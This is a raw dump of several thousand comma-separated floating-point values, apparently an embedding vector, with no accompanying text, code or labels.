0.021875113248825073, 0.05752183496952057, -0.051085419952869415, 0.03557423874735832, 0.006889428477734327, 0.007748342119157314, 0.0035298806615173817, 0.020396476611495018, -0.01235095877200365, 0.0191497839987278, -0.006291450932621956, 0.016670893877744675, -0.009139998815953732, -0.004008262883871794, -0.01729424111545086, 0.015148770064115524, -0.023339252918958664, 0.007799079641699791, -0.004189468454569578, 0.011582647450268269, 0.03983619064092636, -0.03679193928837776, -0.014626897871494293, -0.011278222315013409, -0.006037763319909573, -0.013713623397052288, -0.016670893877744675, -0.013720870949327946, -0.015003805048763752, 0.02713731676340103, -0.021962091326713562, 0.025020837783813477, -0.029427753761410713, -0.003533504903316498, 0.02758670598268509, -0.0019370855297893286, -0.030703438445925713, 0.03276193141937256, -0.06720545142889023, 0.015351719222962856, -0.005410792771726847, -0.0131120216101408, 0.02667343243956566, -0.029616206884384155, 0.0011751168640330434, -0.019512195140123367, -0.0032689450308680534, -0.009683615528047085, 0.02576015703380108, -0.025803646072745323, 0.004816439002752304, 0.026687927544116974, 0.04427209869027138, -0.02043996751308441, -0.023455224931240082, -0.01298880111426115, 0.008886312134563923, 0.00500851683318615, 0.013068531639873981, 0.007121371570974588, 0.0007787300855852664, 0.004080744925886393, -0.0036150473169982433, 0.009480665437877178, 0.02210705541074276, 0.01187982503324747, -0.012082774192094803, -0.009944550693035126, 0.008393432945013046, 0.01538071222603321, 0.025905121117830276, -0.0402710847556591, 0.011278222315013409, 0.011307215318083763, -0.024354003369808197, 0.027543216943740845, 0.013568658381700516, -0.011089769192039967, 0.0015692386077716947, -0.01314101368188858, -0.016337476670742035, 0.02655746042728424, -0.0458667054772377, 0.02971768192946911, -0.014887833967804909, -0.00157195667270571, 0.002015003701671958, 0.021092306822538376, -0.012524915859103203, 0.0072844563983380795, -0.05001268535852432, 0.009053020738065243, 0.026934366673231125, -0.0392853245139122, 0.0059580327942967415, 0.019265756011009216, -0.05036059767007828, 0.046272605657577515, -0.04047403484582901, -0.02473090961575508, -0.03206610307097435, 0.024933859705924988, -0.028702931478619576, -0.05433262139558792, 0.00044146159780211747, 0.0593193918466568, -0.015786612406373024, -0.01712028495967388, 0.00827021338045597, -0.015757620334625244, 0.031225310638546944, -0.019048308953642845, -0.008415177464485168, 0.022338999435305595, 0.0095748919993639, 0.033573731780052185, 0.017656652256846428, 0.011452180333435535, 0.026687927544116974, 0.021657666191458702, 0.0301525741815567, -0.010133004747331142, 0.00979233905673027, 0.010118508711457253, 0.03148624673485756, 0.025354256853461266, 0.0022614430636167526, 0.026209546253085136, -0.06349436193704605, 0.028007103130221367, -0.0005830283043906093, 0.008089007809758186, 0.015032798051834106, 0.0010537093039602041, 0.05610118433833122, 0.004946907050907612, -0.04035806283354759, -0.0023067444562911987, 0.04293842613697052, -0.028253542259335518, -0.02348421700298786, -0.011727612465620041, -0.007480158004909754, -0.00864712055772543, 0.017410213127732277, -0.03383466973900795, -0.029471242800354958, -0.03679193928837776, -0.019816620275378227, 0.031689196825027466, -0.011705867014825344, 0.03450150415301323, -0.008850070647895336, 0.023614684119820595, 0.03209509700536728, -0.03922734037041664, -0.02655746042728424, -0.027731671929359436, 0.04064799100160599, -0.029427753761410713, 0.005465154070407152, -0.0001544775877846405, 0.026774907484650612, -0.009995288215577602, -0.021454716101288795, 0.008067263290286064, 0.008154242299497128, 0.006624868605285883, 0.03937230631709099, 0.009734353050589561, -0.0012747797882184386, -0.0012539412127807736, 0.014692132361233234, 0.011089769192039967, 0.025832638144493103, 0.018381472676992416, -0.012662631459534168, -0.00210560648702085, -0.0056354873813688755, -0.015148770064115524, -0.006871307734400034, 0.007574385032057762, -0.0010482730576768517, 0.02000507339835167, 0.007309825159609318, 0.03131229057908058, -0.01259014941751957, 0.003982894122600555, -0.009284963831305504, -0.037197839468717575, -0.010104011744260788, -0.001528467400930822, -0.008792084641754627, 0.00594716053456068, -0.018830863758921623, -0.01257565338164568, 0.010814337059855461, -0.004425035323947668, -0.01638096570968628, 0.004080744925886393, 0.02119378186762333, 0.012916319072246552, -0.007936795242130756, -0.026542963460087776, 0.018526438623666763, -0.02390461415052414, 0.01282209251075983, 0.004319936037063599, 0.020381981506943703, 0.022672416642308235, 0.01714927703142166, -0.020744390785694122, 0.039575256407260895, 0.006990903522819281, 0.024078570306301117, -0.03441452607512474, -0.01878737285733223, 0.029166817665100098, -0.00997354369610548, 0.009379190392792225, -0.0141920056194067, -0.01817852444946766, -0.005639111157506704, -0.05784075707197189, -0.007726597134023905, -0.042010653764009476, 0.010248975828289986, -0.004765701480209827, 0.023890117183327675, 0.016917334869503975, -0.0375167615711689, 0.0013155509950593114, -0.013264233246445656, 0.036617983132600784, 0.01348892878741026, 0.034646470099687576, -0.000841245986521244, 0.006824194453656673, 0.0032399522606283426, 0.005494147073477507, -0.010212735272943974, -0.003165657864883542, -0.015351719222962856, 0.04482296109199524, -0.012039285153150558, -0.0053962962701916695, 0.005541260354220867, -0.0021092304959893227, 0.00455187913030386, -0.015569166280329227, -0.01257565338164568, 0.029949624091386795, -0.023063819855451584, 0.018135033547878265, -0.013394701294600964, 0.04433008283376694, -0.007135867606848478, 0.016178015619516373, -0.014025296084582806, 0.008161489851772785, 0.006715471390634775, -0.019497698172926903, 0.0007565324776805937, 0.01574312336742878, -0.006313195452094078, 0.018308991566300392, 0.0011796470498666167, 0.030529482290148735, 0.030645454302430153, 0.0011098829563707113, 0.020352987572550774, 0.010089515708386898, 0.010038778185844421, -0.03609611093997955, -0.007204725872725248, 0.0076178740710020065, 0.007726597134023905, 0.007317073177546263, -0.016786865890026093, 0.006907549221068621, 0.021701155230402946, 0.0006115681608207524, 0.029978618025779724, 0.005573877599090338, 0.014003551565110683, -0.0026311019901186228, -0.007045265287160873, -0.007117747329175472, -0.02091834880411625, -0.01601855456829071, 0.011104265227913857, -0.024803392589092255, -0.029094334691762924, 0.01793208345770836, 0.007019896525889635, -0.01994708739221096, 0.02091834880411625, 0.013467183336615562, -0.002332113217562437, -0.02338274195790291, -0.014105026610195637, 0.012735114432871342, 0.015308230184018612, -0.016525929793715477, 0.007124995347112417, -0.01784510537981987, 0.02418004535138607, 0.02183162420988083, -0.0015764867421239614, -0.004178596194833517, -0.024687420576810837, 0.022817380726337433, -0.02409306727349758, -0.02274489961564541, -0.028673939406871796, 0.004396042320877314, 0.021121298894286156, 0.0034139093477278948, -0.04273547604680061, 0.052824992686510086, -0.0025223789270967245, 0.03134128078818321, 0.055869244039058685, -0.011147755198180676, 0.002680027624592185, 0.006458159536123276, 0.02661544643342495, 0.009263219311833382, 0.012336461804807186, 0.02296234481036663, 0.027949117124080658, -0.041343819350004196, 0.022034574300050735, -0.024803392589092255, -0.0023230528458952904, 0.02849998138844967, 0.006715471390634775, -0.03748776763677597, -0.0017223571194335818, -0.00863262452185154, -0.04711339995265007, 0.02025151252746582, 0.004870800767093897, -0.026687927544116974, -0.036531005054712296, 0.007375058718025684, 0.03197912499308586, -0.0046134889125823975, -0.015714131295681, 0.016496937721967697, 0.009596636518836021, 0.00014167994959279895, -0.04172072559595108, 0.0007334287511184812, -0.013372956775128841, 0.0007855253061279655, 0.004084369167685509, -0.011669626459479332, -0.0011687746737152338, 0.010952052660286427, -0.029311781749129295, -0.047432318329811096, 0.00018165839719586074, 0.006849563214927912, 0.04050302505493164, -0.011669626459479332, 0.021976588293910027, 0.048099156469106674, -0.007291704416275024, -0.005664479918777943, -0.010154749266803265, -0.0663936510682106, -0.007364186458289623, -0.014402203261852264, 0.0035226326435804367, -0.014742869883775711, -0.019193273037672043, 0.01343094278126955, -0.024035081267356873, -0.009176240302622318, 0.00210560648702085, -0.015032798051834106, 0.017743630334734917, -0.006806074175983667, 0.009777842089533806, -0.0006527923978865147, -0.0015465879114344716, -0.00019638132653199136, -0.008060014806687832, 0.004356177523732185, -0.001258471398614347, -0.012764106504619122, 0.000541804067324847, 0.011444931849837303, -0.0027561339084059, 0.00459899241104722, -0.016250498592853546, -0.0023592940997332335, -0.03076142445206642, -0.008915304206311703, 0.029253795742988586, 0.01790309138596058, 0.00008420387166552246, 0.054651543498039246, -0.012923567555844784, -0.0380096398293972, 0.034211575984954834, -0.004475772846490145, -0.011618888936936855, -0.015395209193229675, -0.017337730154395103, 0.0036295438185334206, 0.010560649447143078, -0.02329576388001442, -0.003109484212473035, 0.019193273037672043, 0.004243829753249884, -0.004653354175388813, 0.026470482349395752, -0.024296017363667488, -0.010647628456354141, 0.011423187330365181, -0.024049578234553337, 0.022831877693533897, -0.00935019738972187, -0.007581633049994707, 0.016859348863363266, -0.018048055469989777, 0.003914036322385073, 0.0336897037923336, -0.03618308901786804, -0.04357627034187317, -0.024020584300160408, -0.00667560612782836, 0.01933823712170124, 0.012901823036372662, 0.008204979822039604, -0.005823940970003605, 0.032356031239032745, 0.010067771188914776, -0.02938426472246647, -0.02415105327963829, 0.036009132862091064, 0.011336208321154118, -0.0176276583224535, -0.0027072082739323378, -0.0028467364609241486, -0.0008240314782597125, 0.02896386757493019, 0.014105026610195637, 0.005501395091414452, 0.0034429021179676056, -0.007153988350182772, -0.025107817724347115, -0.006244337186217308, -0.017033305019140244, 0.012923567555844784, -0.020671909675002098, -0.015235748142004013, 0.013706374913454056, 0.015003805048763752, 0.02110680192708969, 0.0196426622569561, -0.025296270847320557, -0.020019570365548134, -0.013786105439066887, 0.017497191205620766, -0.003805313026532531, 0.011539158411324024, 0.002982640638947487, 0.0026745914947241545, -0.02320878393948078, 0.006324067711830139, -0.0005467872251756489, 0.005646359641104937, 0.007288080174475908, 0.00008743159560253844, -0.025876127183437347, 0.020541442558169365, -0.009937303140759468, 0.015786612406373024, -0.01235095877200365, -0.02658645249903202, -0.01607654057443142, 0.015873590484261513, -0.005907295271754265, -0.0131845036521554, 0.005755082704126835, 0.005668104160577059, -0.014489182271063328, -0.041488781571388245, 0.010357699356973171, -0.026818396523594856, 0.005631863139569759, 0.02539774589240551, -0.005109991878271103, 0.016149023547768593, -0.003350487444549799, 0.0007012648275122046, 0.021483710035681725, -0.0005105461459606886, -0.007248214911669493, 0.02503533475100994, -0.03139926865696907, -0.004892545286566019, -0.016583915799856186, 0.01936723105609417, 0.018468452617526054, 0.023498713970184326, -0.015206755138933659, 0.006400173995643854, 0.008473163470625877, -0.0105823939666152, -0.03148624673485756, -0.01970064826309681, -0.018077049404382706, -0.011466676369309425, 0.026050085201859474, -0.03580618277192116, -0.005193346180021763, -0.014518175274133682, 0.020092051476240158, 0.01933823712170124, -0.020352987572550774, 0.015337223187088966, 0.013256985694169998, -0.0037328307516872883, -0.04406914860010147, -0.019686153158545494, 0.024006089195609093, -0.018917841836810112, -0.0022958721965551376, 0.004479397088289261, -0.0524480864405632, 0.03166020289063454, -0.02351320907473564, 0.003662160597741604, 0.019932592287659645, 0.016120029613375664, 0.01745370216667652, -0.007552640046924353, 0.011408690363168716, 0.003680281341075897, -0.0028992861043661833, -0.002709020394831896, 0.013909325003623962, -0.01135795284062624, -0.004609864670783281, -0.005765954963862896, 0.01160439196974039, -0.041430797427892685, -0.02874642051756382, -0.014416700229048729, -0.04070597514510155, -0.009429927915334702, -0.011626137420535088, 0.008625376038253307, -0.010444678366184235, 0.01350342482328415, 0.009857572615146637, 0.0022052694112062454, 0.03467546030879021, -0.00011619794531725347, 0.02634001336991787, -0.004830935504287481, 0.012321965768933296, -0.01373536791652441, -0.003263508901000023, 0.012343710288405418, -0.008371688425540924, 0.04543181136250496, 0.012155257165431976, -0.021295256912708282, 0.013539666309952736, 0.0036386039573699236, -0.004428659565746784, 0.0048599280416965485, -0.04096691310405731, -0.006309571210294962, -0.011459427885711193, -0.01422099769115448, -0.03261696919798851, 0.004638857673853636, 0.022527452558279037, -0.024440981447696686, 0.01282209251075983, 0.0105823939666152, -0.009611133486032486, 0.0019479577895253897, -0.00303337792865932, -0.007313448935747147, 0.03250099718570709, -0.012227739207446575, 0.0002040825638687238, 0.030674446374177933, -0.042010653764009476, 0.015569166280329227, -0.0428224541246891, -0.035458266735076904, 0.02174464613199234, 0.007349689956754446, -0.018410466611385345, -0.04111187532544136, -0.03134128078818321, 0.03809661790728569, 0.04041604697704315, 0.020700901746749878, -0.041981663554906845, -0.017830608412623405, -0.01607654057443142, -0.013452687300741673, -0.013322219252586365, 0.015641648322343826, -0.011916065588593483, -0.015946073457598686, 0.008183235302567482, 0.03424056991934776, 0.007994781248271465, -0.006813322193920612, 0.0527380146086216, 0.03209509700536728, 0.0121045196428895, -0.01912079192698002, -0.04467799887061119, -0.021846121177077293, -0.017526183277368546, -0.03279092535376549, 0.021643171086907387, 0.00463523343205452, 0.0663936510682106, 0.003500887891277671, 0.0077628386206924915, 0.01149566937237978, 0.016786865890026093, 0.02083137072622776, -0.002480701543390751, -0.019381728023290634, 0.0067408401519060135, -0.0048599280416965485, 0.024672923609614372, 0.020686406642198563, -0.039662234485149384, -0.0013599463272839785, 0.013119269162416458, 0.02155619114637375, -0.0077628386206924915, -0.014336969703435898, -0.00603051483631134, -0.005418040789663792, -0.03026854619383812, 0.006642989348620176, 0.0253397598862648, 0.010089515708386898, 0.00537455128505826, 0.0009313956252299249, 0.04247454181313515, 0.010778095573186874, -0.0014677635626867414, -0.019802123308181763, -0.026542963460087776, -0.01283658854663372, -0.007128619588911533, -0.013952814042568207, -0.03215308114886284, -0.03166020289063454, 0.02957271784543991, -0.007385931443423033, -0.011582647450268269, -0.011995796114206314, 0.008386184461414814, 0.007349689956754446, 0.016743376851081848, -0.010248975828289986, -0.017714638262987137, 0.019135287031531334, 0.0021182908676564693, -0.026455985382199287, -0.004544631112366915, -0.02755771391093731, -0.03916935622692108, 0.001975138671696186, -0.01511977706104517, 0.02354220300912857, 0.06656760722398758, 0.00832819938659668, 0.05508643388748169, -0.010437429882586002, -0.01513427309691906, -0.011865328066051006, -0.0062660821713507175, 0.0283840112388134, -0.028760917484760284, 0.01933823712170124, -0.011104265227913857, -0.018352480605244637, -0.008393432945013046, -0.0095748919993639, 0.01160439196974039, 0.008060014806687832, -0.015598159283399582, -0.01714927703142166, 0.03261696919798851, 0.023397238925099373, -0.04490993916988373, 0.04174971953034401, -0.004805566743016243, 0.004562751390039921, -0.032935891300439835, -0.032993875443935394, -0.0428224541246891, -0.03554524853825569, -0.02667343243956566, 0.003631355706602335, -0.028253542259335518, -0.010364947840571404, 0.01072011049836874, 0.011582647450268269, 0.012358207255601883, -0.006324067711830139, 0.02683289162814617, -0.009799586609005928, 0.004479397088289261, 0.006092124618589878, -0.00394302885979414, -0.017656652256846428, -0.011691370978951454, -0.027340266853570938, 0.014960316009819508, 0.007458413485437632, 0.047461312264204025, -0.03018156811594963, -0.00017101257981266826, -0.008103504776954651, 0.015337223187088966, 0.0034519624896347523, 0.030007610097527504, -0.00843692198395729, -0.005428913049399853, 0.012220490723848343, 0.0357481986284256, -0.006907549221068621, -0.01373536791652441, 0.0011434059124439955, 0.01994708739221096, 0.0030188816599547863, -0.012662631459534168, 0.02091834880411625, -0.015047295019030571, 0.004678722936660051, 0.0029101583641022444, 0.026905374601483345, 0.015163266099989414, -0.04531583935022354, -0.021425724029541016, -0.006548762321472168, 0.00802377425134182, 0.024165548384189606, -0.002689087763428688, -0.001908092643134296, -0.009292211383581161, -0.0017286993097513914, -0.005287572741508484, 0.0274997279047966, -0.010408436879515648, -0.014460189267992973, 0.0024607691448181868, -0.0010890443809330463, -0.005921791773289442, 0.01545319426804781, -0.019164280965924263, -0.022396985441446304, -0.03563222661614418, 0.0176276583224535, -0.03493639826774597, -0.023803139105439186, -0.017047801986336708, -0.00431631226092577, 0.013372956775128841, -0.01759866625070572, 0.010248975828289986, 0.0024589570239186287, 0.021657666191458702, -0.010459174402058125, -0.013938318006694317, 0.01793208345770836, -0.012633639387786388, 0.020700901746749878, 0.005907295271754265, -0.03281991928815842, -0.01696082390844822, 0.009545898996293545, -0.020961837843060493, -0.008509404957294464, 0.015003805048763752, -0.05073750764131546, -0.005896423012018204, -0.010140253230929375, -0.03281991928815842, 0.022831877693533897, -0.0015438698465004563, -0.028543470427393913, -0.01897582784295082, 0.013003298081457615, -0.02022252045571804, -0.027992606163024902, -0.011278222315013409, 0.036531005054712296, 0.03986518457531929, 0.030645454302430153, -0.009814083576202393, -0.011285470798611641, -0.010923060588538647, -0.005265828222036362, 0.010480918921530247, 0.005668104160577059, 0.00045391946332529187, 0.014793607406318188, 0.0400681346654892, 0.011705867014825344, -0.0024879497941583395, -0.010495415888726711, 0.019381728023290634, -0.002723516896367073, -0.005428913049399853, -0.02531076781451702, 0.010988294146955013, 0.002484325785189867, -0.012169753201305866, 0.01580110937356949, 0.025803646072745323, -0.018352480605244637, 0.0004319483123254031, 0.00911825429648161, 0.0035280687734484673, -0.013003298081457615, -0.005323814228177071, 0.0036259195767343044, 0.003176530357450247, -0.006548762321472168, 0.002872105222195387, -0.008306454867124557, 0.014554415829479694, -0.013517920859158039, 0.022121552377939224, -0.013713623397052288, -0.0015529301017522812, -0.010147500783205032, 0.018932338804006577, 0.0036259195767343044, -0.015641648322343826, -0.006128366105258465, 0.007893306203186512, -0.023498713970184326, 0.03693690523505211, -0.007639618590474129, -0.010009785182774067, -0.013017794117331505, -0.018917841836810112, -0.01912079192698002, 0.020642917603254318, 0.0387924462556839, -0.005432537291198969, 0.022672416642308235, 0.0016027615638449788, -0.005552132613956928, -0.013409198261797428, -0.012162504717707634, -0.014576160348951817, 0.0005843873368576169, 0.0023447975981980562, 0.00625158566981554, 0.007581633049994707, -0.027209799736738205, -0.011473924852907658, 0.00987931713461876, 0.011734860017895699, 0.03792266175150871, -0.0036512883380055428, 0.026818396523594856, 0.00840792991220951, -0.0025115064345300198, 0.0253397598862648, 0.03867647424340248, -0.00948791392147541, 0.01134345680475235, -0.03163120895624161, -0.023310258984565735, 0.014858840964734554, 0.023005835711956024, 0.01845395565032959, 0.02481788769364357, -0.02155619114637375, 0.03429855406284332, -0.02113579586148262, 0.010038778185844421, -0.02390461415052414, -0.00429456727579236, -0.012372703291475773, -0.002080237725749612, 0.020092051476240158, 0.003046062309294939, 0.014329721219837666, 0.01903381384909153, 0.011155002750456333, -0.00925597082823515, -0.010270721279084682, -0.017004312947392464, 0.010850577615201473, -0.00648715253919363, 0.023919109255075455, 0.005233211442828178, -0.021585185080766678, 0.013017794117331505, 0.013786105439066887, 0.004794694483280182, 0.012336461804807186, -0.005997898057103157, -0.035429276525974274, -0.03629906103014946, 0.007878810167312622, -0.022063566371798515, -0.012155257165431976, 0.003046062309294939, -0.0009422679431736469, 0.004406914580613375, -0.004541006870567799, -0.04354727640748024, -0.02755771391093731, -0.0185119416564703, 0.021034320816397667, -0.005624615121632814, -0.005791323725134134, 0.017062298953533173, 0.009466169402003288, 0.005852933507412672, 0.046301599591970444, 0.038995396345853806, 0.02628202736377716, 0.0084224259480834, -0.009016779251396656, -0.02634001336991787, 0.03754575550556183, -0.024020584300160408, 0.025716667994856834, 0.004102489911019802, -0.00817598681896925, -0.00918348878622055, -0.010531656444072723, 0.01839596964418888, 0.029978618025779724, 0.04125684127211571, 0.001986010931432247, -0.0141920056194067, 0.021904105320572853, 0.00347189512103796, 0.008154242299497128, 0.001280216034501791, 0.0013182691764086485, -0.0027072082739323378, 0.014699379913508892, 0.029529228806495667, -0.009683615528047085, 0.007019896525889635, 0.015163266099989414, -0.019526692107319832, -0.02241148054599762, 0.014163012616336346, 0.008929801173508167, 0.027659188956022263, 0.002623853972181678, -0.01759866625070572, -0.005845685489475727, 0.04087993502616882, 0.005153480917215347, -0.05821766331791878, -0.02083137072622776, -0.030413510277867317, 0.0035624976735562086, 0.01335121225565672, 0.007610626053065062, 0.015815604478120804, 0.018830863758921623, 0.01812053844332695, -0.013967311009764671, 0.0014822599478065968, 0.010633131489157677, -0.015482187271118164, -0.013285978697240353, 0.023136302828788757, 0.0021962092723697424, -0.009451672434806824, 0.019439712166786194, -0.02304932475090027, 0.014945819973945618, 0.004055376164615154, -0.017192766070365906, 0.023977095261216164, 0.012858333997428417, 0.026687927544116974, -0.03284890949726105, -0.019323742017149925, -0.01632297970354557, -0.024223534390330315, -0.01242344081401825, -0.01577211543917656, -0.013474431820213795, 0.0054724025540053844, -0.011350705288350582, 0.008197731338441372, -0.02741274982690811, 0.02591961808502674, -0.014278983697295189, -0.04285144805908203, -0.0005227774963714182, 0.010205486789345741, -0.016554923728108406, 0.0009558583842590451, -0.013010546565055847, 0.014822599478065968, 0.023556699976325035, -0.0071322438307106495, -0.009219729341566563, 0.010386692360043526, 0.019048308953642845, -0.0176276583224535, 0.002495198044925928, 0.023585692048072815, -0.02174464613199234, 0.029253795742988586, 0.008226724341511726, -0.012234986759722233, -0.02119378186762333, 0.010705613531172276, 0.02789113111793995, -0.024527959525585175, -0.005200594197958708, -0.014605153352022171, -0.007266335655003786, -0.0011841771192848682, 0.024774398654699326, -0.004925162065774202, -0.01289457455277443, -0.006313195452094078, 0.006447287276387215, 0.00042130250949412584, -0.0021654043812304735, -0.03247200325131416, -0.0025767404586076736, -0.019381728023290634, -0.024354003369808197, 0.0061029973439872265, -0.017323235049843788, -0.00029264669865369797, -0.011502917855978012, 0.025774652138352394, -0.001528467400930822, 0.021367738023400307, -0.016757873818278313, -0.008313702419400215, -0.013329467736184597, 0.01041568536311388, -0.01312651764601469, 0.03325480967760086, 0.018004566431045532, 0.009415431879460812, 0.017410213127732277, 0.017395716160535812, -0.007900554686784744, -0.015946073457598686, -0.00942267943173647, 0.008596383035182953, -0.031718190759420395, 0.028065089136362076, 0.009611133486032486, -0.010270721279084682, 0.00020498858066275716, -0.0002573116507846862, 0.012177001684904099, 0.01329322624951601, 0.020425470545887947, 0.01668539084494114, -0.021454716101288795, 0.011517413891851902, 0.016496937721967697, -0.032703947275877, -0.014634146355092525, 0.007306200917810202, -0.025963107123970985, 0.018772877752780914, 0.008233972825109959, -0.022367991507053375, 0.009567643515765667, -0.006798825692385435, -0.048621028661727905, 0.003924908582121134, -0.0013644765131175518, -0.0039176600985229015, 0.01513427309691906, 0.0028159315697848797, -0.006367557216435671, -0.007828072644770145, 0.020642917603254318, 0.00014530406042467803, -0.023890117183327675, 0.041343819350004196, -0.0032925016712397337, -0.0033432391937822104, 0.01912079192698002, 0.007106875069439411, 0.04673648998141289, 0.036675967276096344, -0.020570434629917145, 0.009734353050589561, -0.00827021338045597, -0.002362918108701706, 0.016496937721967697, 0.006585003342479467, 0.009734353050589561, -0.01717826910316944, -0.004156851209700108, -0.020816873759031296, 0.009313956834375858, 0.0023846628610044718, 0.0038777950685471296, 0.002699960023164749, -0.015322727151215076, -0.01693182997405529, 0.019570181146264076, 0.002556807827204466, -0.05140434205532074, -0.04847606271505356, -0.0007361468742601573, 0.012394447810947895, 0.0014849781291559339, -0.00018233791342936456, 0.012466929852962494, -0.016641901805996895, 0.010386692360043526, 0.02357119508087635, 0.03638603910803795, -0.007574385032057762, 0.010857826098799706, -0.0038234335370361805, -0.001780342892743647, 0.01221324224025011, 0.012387199327349663, -0.014090530574321747, -0.0163519736379385, 0.047983184456825256, -0.015395209193229675, 0.008357192389667034, 0.02515130676329136, 0.0026455984916538, 0.018990322947502136, 0.008973290212452412, 0.00965462252497673, -0.012321965768933296, -0.013626644387841225, -0.02365817502140999, -0.009400934912264347, 0.010031529702246189, 0.014902330003678799, 0.025687674060463905, 0.006965534761548042, 0.0012956184800714254, 0.0069872792810201645, -0.017990069463849068, -0.003557061543688178, 0.004881673026829958, 0.011444931849837303, 0.010408436879515648, 0.010285217314958572, 0.034762438386678696, -0.03073243238031864, -0.0061791036278009415, -0.001853730995208025, -0.026079077273607254, -0.021643171086907387, 0.014916826970875263, 0.019657159224152565, -0.006164607126265764, -0.013017794117331505, 0.008458667434751987, 0.022570941597223282, -0.018352480605244637, -0.02049795165657997, 0.028818903490900993, 0.0007411299739032984, 0.004414163064211607, -0.003330554813146591, -0.007317073177546263, -0.03621208295226097, 0.003910412080585957, -0.002721704775467515, -0.011068024672567844, -0.002527815056964755, -0.013800601474940777, 0.003154785605147481, 0.013467183336615562, -0.01105352770537138, 0.03647301718592644, 0.01221324224025011, 0.013177255168557167, 0.004240205977112055, 0.022454969584941864, -0.02752872183918953, 0.001962454291060567, 0.025629688054323196, 0.024774398654699326, -0.012713368982076645, 0.012329214252531528, 0.01659841276705265, -0.007230094633996487, 0.010328706353902817, -0.02667343243956566, 0.04609864950180054, -0.005113615654408932, 0.01228572428226471, 0.00004558447835734114, 0.02274489961564541, -0.01598956249654293, -0.019657159224152565, -0.01359765138477087, -0.0031366650946438313, 0.00014326549717225134, 0.001388033153489232, 0.0069111729972064495, -0.008835574612021446, 0.01867140270769596, -0.01955568417906761, -0.0014088718453422189, 0.015047295019030571, -0.022817380726337433, 0.001388033153489232, 0.0007270865608006716, 0.015061791054904461, 0.014902330003678799, 0.0008910774486139417, 0.032964881509542465, 0.009567643515765667, 0.020381981506943703, 0.02923930063843727, -0.008654369041323662, -0.00840792991220951, 0.0068278186954557896, 0.0008937955135479569, -0.004541006870567799, 0.009915558621287346, -0.007704852614551783, -0.0022487586829811335, 0.011249230243265629, -0.006845938973128796, -0.009466169402003288, -0.012916319072246552, -0.010147500783205032, -0.0005236835568211973, 0.0022922479547560215, 0.02893487550318241, 0.004780197981745005, 0.00606675585731864, 0.020367484539747238, 0.012488674372434616, -0.0033704200759530067, 0.005961657036095858, -0.008842822164297104, 0.0009255064651370049, -0.0023502337280660868, 0.021266262978315353, -0.006095748860388994, 0.013496176339685917, -0.012967056594789028, -0.004512013867497444, 0.009386438876390457, 0.00268727564252913, -0.008944297209382057, -0.009009531699120998, -0.02232450246810913, 0.02658645249903202, -0.01812053844332695, 0.01778711937367916, -0.009437176398932934, 0.02000507339835167, 0.004816439002752304, -0.026354510337114334, -0.01321349572390318, -0.0071503641083836555, 0.00030148043879307806, -0.006527017802000046, -0.0058638062328100204, -0.004772949498146772, -0.020092051476240158, -0.004975899588316679, 0.0047584534622728825, 0.005193346180021763, 0.01759866625070572, 0.014307976700365543, 0.015003805048763752, -0.005218714941293001, -0.004983148071914911, -0.005523140076547861, 0.011597144417464733, 0.020410973578691483, 0.017439205199480057, -0.0009350197506137192, 0.015279237180948257, 0.022585438564419746, -0.009313956834375858, 0.007748342119157314, -0.0034102851059287786, 0.016757873818278313, -0.011560902930796146, 0.014989309012889862, -0.006269705947488546, -0.007400427479296923, 0.02241148054599762, 0.007509151007980108, -0.010408436879515648, -0.00013771608064416796, 0.0089370496571064, -0.010299713350832462, 0.03484942018985748, 0.0019443336641415954, 0.00979233905673027, -0.005631863139569759, 0.0008693328127264977, -0.025832638144493103, -0.0047004674561321735, 0.014757365919649601, 0.0030641830526292324, 0.006092124618589878, -0.024948356673121452, 0.010096763260662556, 0.00245170877315104, 0.004867176525294781, 0.024064073339104652, -0.002190772909671068, -0.0168448518961668, 0.0028249919414520264, -0.018642408773303032, -0.0042981915175914764, -0.012155257165431976, -0.0017984634032472968, -0.005113615654408932, 0.019294748082756996, -0.011336208321154118, -0.005979777313768864, -0.0205269455909729, 0.008487659506499767, -0.003914036322385073, 0.01580110937356949, 0.014844344928860664, -0.0019425216596573591, -0.013104773126542568, -0.015409705229103565, -0.035980138927698135, -0.02747073583304882, 0.026195049285888672, 0.0037038379814475775, 0.01466313935816288, -0.020295001566410065, -0.02968868985772133, -0.0078570656478405, 0.012785851024091244, -0.010792592540383339, -0.0018809118773788214, -0.012039285153150558, 0.011481172405183315, 0.024252528324723244, -0.0008022867841646075, 0.020512448623776436, 0.03795165568590164, 0.009603885002434254, 0.008494907990098, 0.004577247891575098, 0.015946073457598686, 0.011669626459479332, -0.022527452558279037, -0.004008262883871794, 0.015003805048763752, -0.004656978417187929, 0.017091291025280952, -0.0024988220538944006, -0.003544377163052559, -0.002573116449639201, 0.005932664033025503, 0.01854093372821808, -0.01545319426804781, 0.006777081172913313, 0.016830354928970337, -0.009705360047519207, -0.016728879883885384, -0.008226724341511726, -0.017990069463849068, 0.016859348863363266, -0.029166817665100098, -0.025557206943631172, 0.007146740332245827, 0.020179031416773796, 0.019715145230293274, -0.003134852973744273, -0.0033106221817433834, -0.009154495783150196, -0.00986482109874487, -0.0290218535810709, -0.006284202449023724, 0.007675859611481428, 0.019294748082756996, 0.004617113154381514, 0.0031946508679538965, -0.019932592287659645, -0.006363932974636555, -0.013083028607070446, 0.0017259812448173761, 0.024382995441555977, -0.0035045119002461433, -0.026499474421143532, -0.018308991566300392, 0.01970064826309681, -0.030558474361896515, 0.011118762195110321, 0.007893306203186512, -0.004265574738383293, 0.02667343243956566, -0.0034664589911699295, 0.003914036322385073, 0.0007619686075486243, -0.0200340673327446, 0.012010292150080204, 0.01580110937356949, 0.00980683509260416, -0.017308738082647324, 0.0035860545467585325, 0.0016988003626465797, 0.005820316728204489, -0.012416192330420017, 0.001442394801415503, 0.002806871198117733, 0.03513934835791588, 0.0191497839987278, 0.009371941909193993, 0.012793099507689476, 0.01228572428226471, 0.002319428836926818, -0.004566375631839037, -0.008487659506499767, 0.0017450078157708049, -0.018613416701555252, -0.0006355778896249831, -0.004421411082148552, 0.010104011744260788, 0.015221252106130123, -0.00022695973166264594, -0.006258833687752485, 0.008763091638684273, -0.015525677241384983, 0.010669372975826263, 0.004907041788101196, 0.007900554686784744, 0.011423187330365181, 0.0022088936530053616, 0.014568912796676159, 0.0077700866386294365, -0.0247019175440073, -0.007864313200116158, -0.01997608132660389, -0.013670133426785469, 0.0049360343255102634, 0.02439749240875244, -0.003914036322385073, -0.011850832030177116, 0.00771934911608696, 0.013242488726973534, -0.0021436596289277077, 0.014126771129667759, 0.004004638642072678, 0.003047874430194497, 0.030674446374177933, -0.0007384119089692831, 0.022860869765281677, -0.006240713410079479, 0.0007651397027075291, 0.003787192516028881, 